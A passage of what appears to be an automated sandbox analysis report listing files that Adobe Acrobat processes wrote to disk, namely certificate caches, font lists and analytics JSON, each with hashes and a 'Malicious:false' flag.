                                                                                                                                                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):192
                                                                                                                                                                                                  Entropy (8bit):2.7386214950254377
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:kkFklNXtNkNllXfllXlE/HT8kpbNNX8RolJuRdxLlGB9lQRYwpDdt:kKJ2T8mpNMa8RdWBwRd
                                                                                                                                                                                                  MD5:28CBD269B8C7CA197F4733728ACD4655
                                                                                                                                                                                                  SHA1:04ECAC4BA5F4F198FB8223808597EEB69EA41F13
                                                                                                                                                                                                  SHA-256:B96C192AC7565860773C9DD0CCF48FC3CA495C02392099BDCE0EA4994A3E0F84
                                                                                                                                                                                                  SHA-512:42E222E19A5AB93FF2015E75145EA14FAD55F7F6F82ED0510A5821F2E3C883416AE5A934D4C01E3CA001ADC1B73D3EBE31945FCCA7E270AE6F8602811B737562
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:p...... .......... |47..(....................................................... ..........W.....S..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1233
                                                                                                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5828

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1233
                                                                                                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1233
                                                                                                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10880
                                                                                                                                                                                                  Entropy (8bit):5.214360287289079
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.5828

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10880
                                                                                                                                                                                                  Entropy (8bit):5.214360287289079
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):295
                                                                                                                                                                                                  Entropy (8bit):5.349536553669708
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJM3g98kUwPeUkwRe9:YvXKX45YpW7qKZGMbLUkee9
                                                                                                                                                                                                  MD5:C033C5584FC5A82104BED7665417F466
                                                                                                                                                                                                  SHA1:15AE5E7BA31B0F235EA073F62625D6116719B646
                                                                                                                                                                                                  SHA-256:E3105734F0F9C2BCCC5A0C05A5DB6714B063E19AA003934A2ADF3FBF351322C1
                                                                                                                                                                                                  SHA-512:BFDCA0D654C187AF1966704D69DD7660D7EEE8B10BAEB6B83C26CD20B9F12AF817F55187B09E56ED37E97B94333E18956FBFF8E3B6A6D25CEA6F0FB171D80F4B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):294
                                                                                                                                                                                                  Entropy (8bit):5.288374836164896
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJfBoTfXpnrPeUkwRe9:YvXKX45YpW7qKZGWTfXcUkee9
                                                                                                                                                                                                  MD5:DC29AEB4FC04BA397117A28803E55D79
                                                                                                                                                                                                  SHA1:4F3B4D8BD59B7D2EBE3BC9A2C6704A908899CC44
                                                                                                                                                                                                  SHA-256:E7465CFEDD852C97470223B18D6C1AFFE0345D056121C5849176825982BD173A
                                                                                                                                                                                                  SHA-512:580F19CC609B902D555763BE223A06A05AD98FC2C12AF37000CF7A2DAA4BBF5D77E284720086DAB410F54E90D15B9F32185C96EC52D9A4300806BC579E6A9716
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):294
                                                                                                                                                                                                  Entropy (8bit):5.267369871559972
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJfBD2G6UpnrPeUkwRe9:YvXKX45YpW7qKZGR22cUkee9
                                                                                                                                                                                                  MD5:29AA92A330C73FC0D4280CA46741994F
                                                                                                                                                                                                  SHA1:467279B0C723F89CF7AD6AFD60B0145164DDF5FC
                                                                                                                                                                                                  SHA-256:74D3AC2C4F605C28235B53AE25AB2725421E44997A8906BA7B670243303BF2C1
                                                                                                                                                                                                  SHA-512:176C3573C0FDDE922F7E271544595DF89DEE9415659780FAC72A43E9DA3F1523C251921D23D708F3A17ED6954A8FB3B23298C3AF30D0D1D748F0BDF612789044
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                  Entropy (8bit):5.327944279300924
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJfPmwrPeUkwRe9:YvXKX45YpW7qKZGH56Ukee9
                                                                                                                                                                                                  MD5:22BBFFB3A96B1501D49C310507DA4A93
                                                                                                                                                                                                  SHA1:A338065F474C53658659B274F3641EF076510E4B
                                                                                                                                                                                                  SHA-256:E64CD669A7389F1D4488E3517E0738FCB7412B1A49ECEE36EC7695BA2B2454AD
                                                                                                                                                                                                  SHA-512:2636FFFBA909B86B8505E561D4DB1B871DBDADFC9187DA5229E47427609672AA4119660F5D852321165969F12F2C413FE13D4DA35D218BB1CBDB8C427CE5B7ED
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1123
                                                                                                                                                                                                  Entropy (8bit):5.691337534784311
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Yv6X3iq7pLgE9cQx8LennAvzBvkn0RCmK8czOCCSHn:Yvpihgy6SAFv5Ah8cv/Hn
                                                                                                                                                                                                  MD5:43BACFA8096CCC8A39961259CE30FFD0
                                                                                                                                                                                                  SHA1:71C31D7179E6F56E7572CD02B11BAAB1064455FF
                                                                                                                                                                                                  SHA-256:0888EA4DC7E2CE3AFA670B38232BE90C177760C30B57A50638E783CBF54A6A4B
                                                                                                                                                                                                  SHA-512:B284B4032C0445E6AC5E4C582B7BD4E2D35ACC8B00F912535F027D6C6DCBA9B0EC2561A84CFE999F2E14FECACDD7B30573441ABA3000541021085C65DFD4CC8C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1122
                                                                                                                                                                                                  Entropy (8bit):5.681899612353782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Yv6X3iq3VLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBWn:YvpEFgSNycJUAh8cvYHln
                                                                                                                                                                                                  MD5:0E8BB38925F4F78A14841EF8B0311996
                                                                                                                                                                                                  SHA1:67E67C068719E178C725B0B4B546238799F7865D
                                                                                                                                                                                                  SHA-256:31BB368466AA409C1FC1C47624FE7B093F22F746B54AE28846100A155750C079
                                                                                                                                                                                                  SHA-512:96AA39030651494D857083F4618A0B22421EDBC1106CFBA8409136E2FBE0BDE8C78D310DA709A776ADBBCA64506D52EF031DB33060F96AD1EA50BAB341BF7978
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):292
                                                                                                                                                                                                  Entropy (8bit):5.274566813139954
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:YEQXJ2HXEgWY+FIbRI6XVW7+0Y5CJ2DoAvJfQ1rPeUkwRe9:YvXKX45YpW7qKZGY16Ukee9
                                                                                                                                                                                                  MD5:F864622232F77BC359DD3EC04B057D65
                                                                                                                                                                                                  SHA1:CF389598118D4B62FC18A4B115047082E06709EE
                                                                                                                                                                                                  SHA-256:377306914E222DC20A9020A43B2584791CFDCB9AEC154A57902A92E3971097A1
                                                                                                                                                                                                  SHA-512:106AC046F24F759EDF0FC3516FBAED6415539E1919FFDFC7FD17F9CA1696072C4416F436A7AFADDCE0AB52715840B1E265BE4DE9575F4AA4FD846EF25869410E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:{"analyticsData":{"responseGUID":"71807c25-ee66-42dd-96fb-84b0040143f2","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1731834642889,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1102
                                                                                                                                                                                                  Entropy (8bit):5.677945335978643
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:Yv6X3iqm2LgErcXWl7y0nAvzIBcSJCBViVWn:YvppogH47yfkB5kVHn
                                                                                                                                                                                                  MD5:1EC846DB860C1DA0636448BC649EE893
                                                                                                                                                                                                  SHA1:ECA013EC3D27979CC6A81C940EDFD60BD1BC1958
                                                                                                                                                                                                  SHA-256:AB4AE010A903A6BA7D285601F25CD21A3CAA7F8E0E513379CE3B03624F24DB2F
                                                                                                                                                                                                  SHA-512:6CE648F3B3C2E0EF963D9406B0DAFB11DC9F423C5C3140B2FDE583EE5B0B8598D8740C5AB091171A46452F219BE3AFCC55CAE5EFD99DA46279504034BCB6858C
                                                                                                                                                                                                  Malicious:false
